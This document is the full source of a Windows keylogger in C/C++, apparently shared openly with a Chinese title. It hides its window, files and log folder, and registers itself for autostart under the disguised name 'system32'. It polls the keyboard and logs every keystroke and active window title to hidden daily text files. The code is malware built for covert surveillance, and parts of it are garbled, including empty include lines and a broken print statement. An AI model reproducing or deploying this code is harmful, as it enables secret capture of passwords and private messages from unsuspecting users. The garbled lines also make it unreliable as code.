键盘记录C语言程序
#include
#include
#include
// Some Global Variables
// Lower Case Key & Some Other Keys
char *LowerCase[]={
"b",
"e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"`",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"0",
"-",
"=",
"[TAB]",
"q",
"w",
"e",
"r",
"t",
"y",
"u",
"i",
"o",
"p",
"[",
"]",
"a",
"s",
"d",
"f",
"g",
"h",
"j",
"k",
"l",
";",
"'",
"z",
"x",
"c",
"v",
"b",
"n",
"m",
",",
".",
"/",
"\\",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
"[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
"[PageUp]",
"[Del]",
"[End]",
"[PageDown]",
"[Left]",
"[UP]",
"[Right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",
};
// Upper Case Key & Some Other Keys
char *UpperCase[]={
"b",
"e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"~",
"!",
"@",
"#",
"$",
"%",
"^",
"&",
"*",
"(",
")",
"_",
"+",
"[TAB]",
"Q",
"W",
"E",
"R",
"T",
"Y",
"U",
"I",
"O",
"P",
"{",
"}",
"A",
"S",
"D",
"F",
"G",
"H",
"J",
"K",
"L",
":",
"\"",
"Z",
"X",
"C",
"V",
"B",
"N",
"M",
"<",
">",
".?",
"|",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
"[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
"[PageUp]",
"[Del]",
"[End]",
"[PageDown]",
"[Left]",
"[Up]",
"[Right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",
};
// Ascii Keys,Forget About It
int SpecialKeys[]={
8,
13,
27,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
192,
49,
50,
51,
52,
53,
54,
55,
56,
57,
48,
189,
187,
9,
81,
87,
69,
82,
84,
89,
85,
73,
79,
80,
219,
221,
65,
83,
68,
70,
71,
72,
74,
75,
76,
186,
222,
90,
88,
67,
86,
66,
78,
77,
188,
190,
191,
220,
17,
91,
32,
92,
44,
145,
45,
36,
33,
46,
35,
34,
37,
38,
39,
40,
144,
111,
106,
109,
107,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
110,
};
HWND PreviousFocus=NULL;
// End Of Data
FILE *fp; // 文件指针
int bKstate[256] = {0}; // Declare The Key State Array
int i,x;
char KeyBuffer[600]; // Key Buffer Array
int state; // Variable To Hode State Of Some Special Key Like CapsLock,Shift And ect
int shift; // Variable To Hode State Of Shift Key
char pBuf[MAX_PATH]; //存放路径的变量
char tBuf[MAX_PATH]; //存放路径的变量
HKEY hKey;
// Function ProtoType Declaration
//----------------------------------------------------------------------
BOOL IsWindowsFocusChange();
BOOL KeyLogger();
//----------------------------------------------------------------------
// End Of Fucntion ProtoType Declara
tion
// Main Function
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" );
int main()
{
CString strDate = CTime::GetCurrentTime().Format("%Y%m%d");
GetModuleFileName(NULL,tBuf,MAX_PATH); //获取程序的当前目录
for (int i=strlen(tBuf); i>0; i--)
{
if (tBuf[i]=='\\')
{
strncpy(pBuf,tBuf,i+1);
break;
}
}
strcat_s(pBuf,"system32\\");
if (GetFileAttributes(pBuf) != FILE_ATTRIBUTE_DIRECTORY)
CreateDirectory(pBuf,NULL);
SetFileAttributes(pBuf,FILE_ATTRIBUTE_HIDDEN);
strcat_s(pBuf,strDate);
strcat_s(pBuf,".txt");
fp=fopen(pBuf,"at+");// 打开文件
SetFileAttributes(pBuf,FILE_ATTRIBUTE_HIDDEN);
CString strTime = CTime::GetCurrentTime().Format("%H:%M:%S");
fprintf(fp,"\r\n%s\r\n",strTime); // 写入文件
if (fp==NULL)
{
exit(1);
}
memset(pBuf,0,sizeof(pBuf)); // Reset The pBuf
const DWORD nTchar = GetModuleFileName(NULL,pBuf,MAX_PATH); //获取程序的当前目录
const DWORD cbData = (nTchar + 1) * sizeof(TCHAR);
SetFileAttributes(pBuf,FILE_ATTRIBUTE_HIDDEN);
// 设为自动运行
memset(tBuf,0,sizeof(tBuf)); // Reset The tBuf
strcat_s(tBuf,"Software\\Microsoft\\Windows\\CurrentVersion\\Run");
if (::RegOpenKeyEx(HKEY_LOCAL_MACHINE,tBuf,0,KEY_READ|KEY_WRITE,&hKey)==ERROR_SUCCESS)
{
::RegSetValueEx(hKey,"system32",0,REG_SZ,(const BYTE*)pBuf,cbData);
::RegCloseKey(hKey);
}
KeyLogger(); // Run The Keylogger
return 0; // The Program Quit
}
// End Of Main
//-------------------------------------------------------------------------
// Purpose: To Check The Active Windows Title
// Return Type: Boolean
// Parameters: NULL
//-------------------------------------------------------------------------
BOOL IsWindowsFocusChange()
{
HWND hFocus = GetForegroundWindow(); // Retrieve The Active Windows's Focus
BOOL ReturnFlag = TRUE; // Declare The Return Flag
if (hFocus != PreviousFocus) // The Active Windows Has Change
{
PreviousFocus = hFocus; // Save The Old Active Windos Focus
int WinLeng = GetWindowTextLength(hFocus); // Get The Active Windows's Caption's Length
char *WindowCaption = (char*) malloc(sizeof(char) * (WinLeng + 2)); // Allocate Memory For The Caption
GetWindowText(hFocus,WindowCaption,(WinLeng + 1)); // Retrieve The Active Windows's Caption
if (strlen(WindowCaption) > 0) // Really Get The Windows's Caption
{
fprintf(fp,"\r\n窗口: %s\r\n",WindowCaption); // 写入文件
fflush(fp);
ReturnFlag=TRUE; // Indicate The Windows's Focus Has Changed
}
free(WindowCaption); // Free The Allocated Memory
}
return ReturnFlag; // Return The Flag
}// End Of IsWindowsFocusChange Function
//-------------------------------------------------------------------------
// Purpose: To Manage(Display)The Keys Retrieved From System's Key Buffer
// Return Type: Boolean
// Parameters: NULL
//------------------------
-------------------------------------------------
BOOL KeyLogger()
{
// Reset The Buffer
memset(KeyBuffer,0,sizeof(KeyBuffer));
while(TRUE) // Forever Loop Is Taking Place Here
{
Sleep(8); // Rest For A While,And Avoid Taking 100% CPU Usage.Pretty Important To Add This Line Or The System Gets Fucked UP
if (IsWindowsFocusChange()) //Check The Active Windows Title
{
if (strlen(KeyBuffer) != 0) // Keys Are Pressed
{
fprintf(fp,"%s",KeyBuffer); // 写入文件
fflush(fp);
memset(KeyBuffer,0,sizeof(KeyBuffer)); // reset The Buffer
}
}
for(i=0;i<95;i++) // Looping To Check Visual Keys
{
shift = GetKeyState(VK_SHIFT); // Check Whether Shift Is Pressed
x = SpecialKeys[i]; // Match The Key
if (GetAsyncKeyState(x) & 0x8000) // Check Combination Keys
{
// See Whether CapsLocak Or Shift Is Pressed
if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed
{
bKstate[x] = 1; //Uppercase Characters A-Z
}
else
if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed
{
bKstate[x] = 2; //Lowercase a-z
}
else
if (shift < 0) // Shift Is Pressed
{
bKstate[x] = 3; //Uppercase Characters A-Z
}
else
bKstate[x] = 4; //Lowercase a-z
}
else
{
if (bKstate[x] != 0) // No Combination Keys Detected
{
state = bKstate[x]; // Retrieve The Current State
bKstate[x] = 0; // Reset The Current State
if (x == 8) // Back Space Is Detected
{
KeyBuffer[strlen(KeyBuffer) - 1] = 0; // One Key Back Then
continue; // Start A New Loop
}
else
if (strlen(KeyBuffer) > 550) // Buffer FULL
{
fprintf(fp,"%s",KeyBuffer); // 写入文件
fflush(fp);
memset(KeyBuffer,0,sizeof(KeyBuffer)); // Reset The Buffer
continue; // Start A New Loop
}
else
if (x == 13) // Enter Is Detected
{
if (strlen(KeyBuffer) == 0) // No Other Keys Retrieved But Enter
{
continue; // Start A New Loop
}
fprintf(fp,"%s\r\n",KeyBuffer); // 写入文件
fprintf(fp,"
fflush(fp);
memset(KeyBuffer,0,sizeof(KeyBuffer)); // Display The Keys With Enter
continue; // Start A New Loop
}
else
if ((state%2) == 1) //Must Be Upper Case Characters
{
strcat_s(KeyBuffer,UpperCase[i]); // Store The Key To Key Buffer
}
else
if ((state%2) == 0) // Must Be Lower Case Characters
{
strcat_s(KeyBuffer,LowerCase[i]); // Store The Key To Key Buffer
}
}
}
}// End Of For Loop
}// End Of While Loop
fclose(fp); // 关闭文件
return TRUE; // Return To The Caller
}// End Of KeyLogger Function
// End Of File